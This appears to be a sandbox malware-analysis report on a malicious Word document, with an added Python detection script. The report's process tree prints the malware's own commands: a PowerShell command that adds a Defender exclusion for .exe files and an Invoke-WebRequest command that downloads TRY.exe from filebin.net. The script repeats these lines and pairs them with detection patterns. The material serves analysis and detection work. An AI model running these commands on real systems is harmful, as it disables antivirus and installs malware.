Analysis Report (Windows)
12543_0008858249_FWDOUTSTANDING_20200604.doc
Overview
General Information
Detection
Score: 76 (range 0 - 100)
Whitelisted: false
Confidence: 100%
Signatures
Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Document contains OLE streams with names of living off the land binaries
Machine Learning detection for sample
Document contains OLE streams with PE executables
Queries the volume information (name, serial number etc) of a device
Yara signature match
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Stores large binary data to the registry
Document contains an embedded VBA macro which executes code when the document is opened / closed
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Sigma detected: Cabinet File Expansion
Potential document exploit detected (performs DNS queries)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Uses insecure TLS / SSL version for HTTPS connection
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Uses cacls to modify the permissions of files
Drops PE files to the windows directory (C:\Windows)
Found evasive API chain checking for process token information
Sigma detected: Msiexec Initiated Connection
Document contains embedded VBA macros
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Checks for available system drives (often done to infect USB drives)
Uses Microsoft's Enhanced Cryptographic Provider
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Sigma detected: Autorun Keys Modification
Classification
- System is w7x64
- WINWORD.EXE (PID: 3036 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
- msiexec.exe (PID: 2996 cmdline: C:\Windows\system32\msiexec.exe /V MD5: AC2E7152124CEED36846BD1B6592A00F)
  - msiexec.exe (PID: 464 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding A7515E85DB42A85129F32A151C15AD96 MD5: 4315D6ECAE85024A0567DF2CB253B7B0)
  - icacls.exe (PID: 1436 cmdline: "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\." /SETINTEGRITYLEVEL (CI)(OI)HIGH MD5: 1542A92D5C6F7E1E80613F3466C9CE7F)
  - expand.exe (PID: 1156 cmdline: "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files MD5: 659CED6D7BDA047BCC6048384231DB9F)
  - TRY.exe (PID: 2272 cmdline: "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe" MD5: 96DF7B0C491646EFC2E5F2E9F0443B8B)
  - cmd.exe (PID: 1136 cmdline: cmd /c thai.bat MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
  - powershell.exe (PID: 1988 cmdline: powershell -command "Set-MpPreference -ExclusionExtension ".exe" MD5: 852D67A27E454BD389FA7F02A8CBE23F)
  - powershell.exe (PID: 2672 cmdline: powershell -command "Invoke-WebRequest -uri https://filebin.net/rf43v6qzghbj7h7b/TRY.exe -o TRY.exe" MD5: 852D67A27E454BD389FA7F02A8CBE23F)
  - icacls.exe (PID: 2068 cmdline: "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\." /SETINTEGRITYLEVEL (CI)(OI)LOW MD5: 1542A92D5C6F7E1E80613F3466C9CE7F)
- rundll32.exe (PID: 2840 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\ MD5: DD81D91FF3B0763C392422865C9AC12E)
- cleanup
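The chain above (macro, Windows Installer, expand.exe, TRY.exe, thai.bat, PowerShell) is what a detection engineer would want to match on endpoint process-creation logs. The following is an added Python example, not Joe Sandbox code and not part of the original report: it reconstructs the tree as constructed events (PIDs, image paths and command lines are copied from the report; the parent links, the placeholder parents 1000 and 500, the PowerShell image path and the rule names are this example's assumptions), applies command-line rules for the behaviours flagged in the signature list, and walks each hit back to its ancestors. Note that nothing in the tree has WINWORD.EXE as its direct parent: the macro reaches msiexec through the Windows Installer service (msiexec.exe /V), so a plain "Office spawns a child process" rule misses this chain.

```python
"""Process-tree triage mirroring the chain in the report above.

Added example (not Joe Sandbox output and not part of the original report).
Events are constructed from the report's command lines; PIDs and image
paths are copied from it, parent PIDs are assumptions (1000 = explorer.exe,
500 = services.exe, which starts msiexec.exe /V).
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str     # full image path, as a Sysmon/4688 event would log it
    cmdline: str   # command line exactly as logged (quoting left intact)


# Constructed process-creation events mirroring the report's process tree.
EVENTS: List[ProcEvent] = [
    ProcEvent(3036, 1000, r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
              r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding'),
    # msiexec /V is the Windows Installer service itself; the macro reaches it
    # through COM, so it is a child of services.exe, not of WINWORD.EXE.
    ProcEvent(2996, 500, r"C:\Windows\system32\msiexec.exe", r"C:\Windows\system32\msiexec.exe /V"),
    ProcEvent(464, 2996, r"C:\Windows\syswow64\MsiExec.exe",
              r"C:\Windows\syswow64\MsiExec.exe -Embedding A7515E85DB42A85129F32A151C15AD96"),
    ProcEvent(1436, 464, r"C:\Windows\system32\ICACLS.EXE",
              r'"C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\." /SETINTEGRITYLEVEL (CI)(OI)HIGH'),
    ProcEvent(1156, 464, r"C:\Windows\system32\EXPAND.EXE",
              r'"C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files'),
    ProcEvent(2272, 464, r"C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe",
              r'"C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe"'),
    ProcEvent(1136, 2272, r"C:\Windows\system32\cmd.exe", r"cmd /c thai.bat"),
    ProcEvent(1988, 1136, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",  # assumed path
              r'powershell -command "Set-MpPreference -ExclusionExtension ".exe"'),
    ProcEvent(2672, 1136, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",  # assumed path
              r'powershell -command "Invoke-WebRequest -uri https://filebin.net/rf43v6qzghbj7h7b/TRY.exe -o TRY.exe"'),
    ProcEvent(2068, 464, r"C:\Windows\system32\ICACLS.EXE",
              r'"C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\." /SETINTEGRITYLEVEL (CI)(OI)LOW'),
    ProcEvent(2840, 2272, r"C:\Windows\system32\rundll32.exe",  # parent assumed
              "C:\\Windows\\system32\\rundll32.exe\" C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 "
              "\"C:\\Users\\user\\AppData\\Local\\Temp\\IXP000.TMP\\"),
]

# Command-line rules, each keyed to a behaviour in the report. Rule names are
# this example's own, not Sigma rule titles.
RULES: Dict[str, re.Pattern] = {
    "defender_exclusion_added": re.compile(r"Set-MpPreference\b.*-Exclusion(Path|Extension|Process)", re.I),
    "web_request_in_cmdline": re.compile(r"\b(Invoke-WebRequest|iwr|DownloadString|DownloadFile|curl|wget)\b", re.I),
    "cabinet_expansion": re.compile(r'\\expand\.exe"?\s.*\S+\.cab\b', re.I),
    "icacls_integrity_level": re.compile(r'\\icacls\.exe"?\s.*/setintegritylevel\b', re.I),
    "iexpress_cleanup_rundll32": re.compile(r"advpack\.dll,DelNodeRunDLL32", re.I),
}
USER_TEMP = re.compile(r"\\AppData\\Local\\Temp\\", re.I)
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def triage(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    """Return (pid, rule) pairs for every event that matches a rule."""
    by_pid = {e.pid: e for e in events}
    hits: List[Tuple[int, str]] = []
    for e in events:
        for name, pat in RULES.items():
            if pat.search(e.cmdline):
                hits.append((e.pid, name))
        if USER_TEMP.search(e.image):          # binary running out of %TEMP%
            hits.append((e.pid, "exec_from_user_temp"))
        parent = by_pid.get(e.ppid)
        if parent and image_name(parent.image) in OFFICE_APPS:
            hits.append((e.pid, "office_child_process"))
    return hits


def ancestry(events: List[ProcEvent], pid: int) -> List[str]:
    """Image names from pid upwards, stopping at the first parent not in the log."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(image_name(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain


if __name__ == "__main__":
    for pid, rule in triage(EVENTS):
        print(f"PID {pid:>5}  {rule:<28} {' <- '.join(ancestry(EVENTS, pid))}")
```

Running it lists seven hits, none of them "office_child_process": the Defender exclusion, the download on the command line, the cab expansion, both icacls integrity changes, TRY.exe executing from %TEMP%, and the advpack.dll cleanup. Walking the ancestry of PID 2672 ends at the two msiexec.exe instances, which is the pivot a hunt over real logs would need to correlate with the Word process through the Windows Installer COM call rather than through a parent link.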
No configs have been found.
Source | Rule | Description | Author | Strings
---|---|---|---|---
| SUSP_Doc_WindowsInstaller_Call_Feb22_1 | Triggers on docfiles executing windows installer. Used for deploying ThinBasic scripts. | Nils Kuhnert |
| Office_AutoOpen_Macro | Detects a Microsoft Office file that contains the AutoOpen Macro function | Florian Roth |

Source | Rule | Description | Author | Strings
---|---|---|---|---
| SUSP_Doc_WindowsInstaller_Call_Feb22_1 | Triggers on docfiles executing windows installer. Used for deploying ThinBasic scripts. | Nils Kuhnert |
| SUSP_Doc_WindowsInstaller_Call_Feb22_1 | Triggers on docfiles executing windows installer. Used for deploying ThinBasic scripts. | Nils Kuhnert |
| SUSP_VBA_FileSystem_Access | Detects suspicious VBA that writes to disk and is activated on document open | Florian Roth |
There are no malicious signatures.
Source | Author
---|---
| Bhabesh Raj
| frack113
| James Pemberton / @4A616D6573
| Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton
| Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
| frack113
No Snort rule has matched.
AV Detection
- Virustotal
- ReversingLabs
- Avira URL Cloud (5 entries)
- Virustotal
- Joe Sandbox ML

Further evidence rows, in report order (detail values absent):
- Code function (1 entry)
- HTTPS traffic detected (2 entries)
- File opened (1 entry)
- File created (2 entries)
- Binary string (3 entries)
- File opened (25 entries)
- Code function (1 entry)
- File opened (6 entries)
- DNS query (1 entry)
- TCP traffic (2 entries)
- ASN Name (1 entry)
- JA3 fingerprint (1 entry)
- IP Address (2 entries)
- HTTPS traffic detected (2 entries)
- Network traffic detected (4 entries)
- String found in binary or memory (5 entries)
- File created (1 entry)
- DNS traffic detected (1 entry)
- HTTP traffic detected (2 entries)

System Summary
Source: | Stream path '\x17163\x16689\x18229\x16766\x18365\x17760\x17636\x16947\x16167\x17896\x17656\x17753\x17074\x16693\x18480' : |